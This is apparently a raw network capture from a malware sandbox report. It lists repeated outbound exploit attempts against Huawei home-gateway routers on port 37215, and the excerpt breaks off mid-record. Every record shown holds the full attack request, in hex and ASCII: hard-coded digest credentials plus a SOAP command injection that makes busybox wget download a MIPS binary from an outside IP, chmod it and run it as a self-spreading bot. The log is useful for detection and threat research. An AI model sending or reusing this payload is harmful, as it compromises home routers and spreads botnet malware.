                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  954192.168.2.1340462157.201.229.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400624990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  955192.168.2.1347500195.56.191.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400681973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  956192.168.2.133457239.110.23.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400702953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  957192.168.2.1354306213.248.156.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400702953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  958192.168.2.1346240151.35.143.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400715113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  959192.168.2.1334984176.149.93.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400732040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  960192.168.2.134147641.169.15.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400732040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  961192.168.2.1353398157.31.9.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400748968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  962192.168.2.1340632157.23.230.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400760889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  963192.168.2.1342076187.97.91.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400774002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 